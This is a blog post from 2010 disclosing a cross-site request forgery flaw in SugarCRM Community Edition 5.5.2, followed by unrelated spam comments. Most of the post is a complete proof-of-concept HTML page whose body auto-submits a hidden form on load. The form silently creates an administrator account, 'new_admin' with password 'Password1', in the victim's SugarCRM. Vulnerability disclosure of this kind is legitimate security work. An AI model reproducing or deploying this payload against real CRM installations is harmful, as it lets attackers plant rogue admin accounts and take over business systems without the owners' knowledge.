This site is soon to be deprecated by http://www.johnleitch.net

Sunday, May 30, 2010

SugarCRM Community Edition 5.5.2 Cross-site Request Forgery

A cross-site request forgery vulnerability in SugarCRM Community Edition 5.5.2 can be exploited to create a new admin.

PoC
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://192.168.1.4/sugarcrm/index.php">
<input type="hidden" name="display_tabs_def" value="display_tabs[]=Home&amp;display_tabs[]=Dashboard&amp;display_tabs[]=Calendar&amp;display_tabs[]=Activities&amp;display_tabs[]=Leads&amp;display_tabs[]=Contacts&amp;display_tabs[]=Accounts&amp;display_tabs[]=Opportunities&amp;display_tabs[]=Emails&amp;display_tabs[]=Campaigns&amp;display_tabs[]=Cases&amp;display_tabs[]=Documents&amp;" />
<input type="hidden" name="hide_tabs_def" value="" />
<input type="hidden" name="remove_tabs_def" value="" />
<input type="hidden" name="module" value="Users" />
<input type="hidden" name="record" value="" />
<input type="hidden" name="action" value="Save" />
<input type="hidden" name="page" value="EditView" />
<input type="hidden" name="return_module" value="Users" />
<input type="hidden" name="return_id" value="" />
<input type="hidden" name="return_action" value="DetailView" />
<input type="hidden" name="password_change" value="true" />
<input type="hidden" name="required_password" value="1" />
<input type="hidden" name="user_name" value="" />
<input type="hidden" name="type" value="" />
<input type="hidden" name="is_group" value="0" />
<input type="hidden" name="portal_only" value="" />
<input type="hidden" name="is_admin" value="1" />
<input type="hidden" name="is_current_admin" value="1" />
<input type="hidden" name="required_email_address" value="0" />
<input type="hidden" name="sugar_user_name" value="new_admin" />
<input type="hidden" name="unique_name" value="" />
<input type="hidden" name="first_name" value="" />
<input type="hidden" name="status" value="Active" />
<input type="hidden" name="last_name" value="a" />
<input type="hidden" name="UserType" value="Administrator" />
<input type="hidden" name="old_password" value="" />
<input type="hidden" name="new_password" value="Password1" />
<input type="hidden" name="confirm_new_password" value="Password1" />
<input type="hidden" name="emailAddressWidget" value="1" />
<input type="hidden" name="emailAddress0" value="" />
<input type="hidden" name="emailAddressPrimaryFlag" value="emailAddress0" />
<input type="hidden" name="emailAddressVerifiedFlag0" value="true" />
<input type="hidden" name="emailAddressVerifiedValue0" value="" />
<input type="hidden" name="useEmailWidget" value="true" />
<input type="hidden" name="email_link_type" value="sugar" />
<input type="hidden" name="mail_smtpuser" value="" />
<input type="hidden" name="mail_smtppass" value="" />
<input type="hidden" name="employee_status" value="Active" />
<input type="hidden" name="title" value="" />
<input type="hidden" name="phone_work" value="" />
<input type="hidden" name="department" value="" />
<input type="hidden" name="phone_mobile" value="" />
<input type="hidden" name="reports_to_name" value="" />
<input type="hidden" name="reports_to_id" value="" />
<input type="hidden" name="phone_other" value="" />
<input type="hidden" name="phone_fax" value="" />
<input type="hidden" name="phone_home" value="" />
<input type="hidden" name="messenger_type" value="" />
<input type="hidden" name="messenger_id" value="" />
<input type="hidden" name="address_street" value="" />
<input type="hidden" name="address_city" value="" />
<input type="hidden" name="address_state" value="" />
<input type="hidden" name="address_postalcode" value="" />
<input type="hidden" name="address_country" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="receive_notifications" value="12" />
<input type="hidden" name="export_delimiter" value="," />
<input type="hidden" name="mailmerge_on" value="0" />
<input type="hidden" name="reminder_time" value="60" />
<input type="hidden" name="default_export_charset" value="ISO-8859-1" />
<input type="hidden" name="user_max_tabs" value="12" />
<input type="hidden" name="user_max_subtabs" value="12" />
<input type="hidden" name="user_subpanel_tabs" value="on" />
<input type="hidden" name="dateformat" value="m/d/Y" />
<input type="hidden" name="currency" value="-99" />
<input type="hidden" name="timeformat" value="H:i" />
<input type="hidden" name="default_currency_significant_digits" value="2" />
<input type="hidden" name="timezone" value="Africa/Abidjan" />
<input type="hidden" name="ut" value="0" />
<input type="hidden" name="num_grp_sep" value="," />
<input type="hidden" name="default_locale_name_format" value="s f l" />
<input type="hidden" name="dec_sep" value="." />
<input type="hidden" name="calendar_publish_key" value="" />
<input type="hidden" name="outboundtest_from_address" value="" />
</form>
</body>
</html>

10 comments:

  1. John Leitch has discovered a vulnerability in SugarCRM, which can be exploited by malicious people to conduct cross-site request forgery attacks.

    churches in fresno ca
    เบต้ากลูแคนมะโฮราคาถูก

    ReplyDelete
  2. When the matter in the content is valued according to guidelines as per the search engines, then it gets a full priority in the index
    of search engines. Once you achieve a good ranking by search engines, your website will be made visible to clients on the first page.

    website design templates
    ecommerce web design

    ReplyDelete
  3. J.Design Group with over 25 years of experience offers a complete range of high end interior design services and decoration of commercial and residential outfits in different communities throughout Florida

    Modern interior designer
    install windows 8 from pendrive

    ReplyDelete
  4. There is a proven connection between prebiotics and weight loss, although they certainly aren't a miracle cure. Find out how to maximize the weight loss and other health benefits you get from these prebiotics.

    indvendige dvre
    e cigarette

    ReplyDelete
  5. Americans throw away about 25 billion Styrofoam coffee cups every year, and 2.5 million plastic beverage bottles every hour. Most of these materials do not biodegrade.

    Passages Malibu Treatment
    alarm service companies

    ReplyDelete
  6. celebrity rumorshervey bay accomodationThe cost of the 3G access for all 3G-enabled Kindles is bundled into the purchase price of the Kindle. This means that Kindle 3G users do not have to subscribe to a data service.
    Amazon also offers the Kindle Keyboard with 3G service, but the device is not sold at AT&T retail locations.
    Amazon also sells Kindle e-readers without 3G service. These devices cost about $50 less than the 3G versions and they

    ReplyDelete
  7. Wonderful blog! I found it while searching on Yahoo News. Do you have any tips on how to get listed in Yahoo News? I’ve been trying for a while but I never sbobet
    seem to get there! Many thanks.

    ReplyDelete
  8. Nice Post,
    Thanks
    vtiger CRM is free open source CRM with full-featured. vTiger crm is best suited for small and medium sized
    business.

    VTiger
    VTiger CRM
    vTiger Integration

    ReplyDelete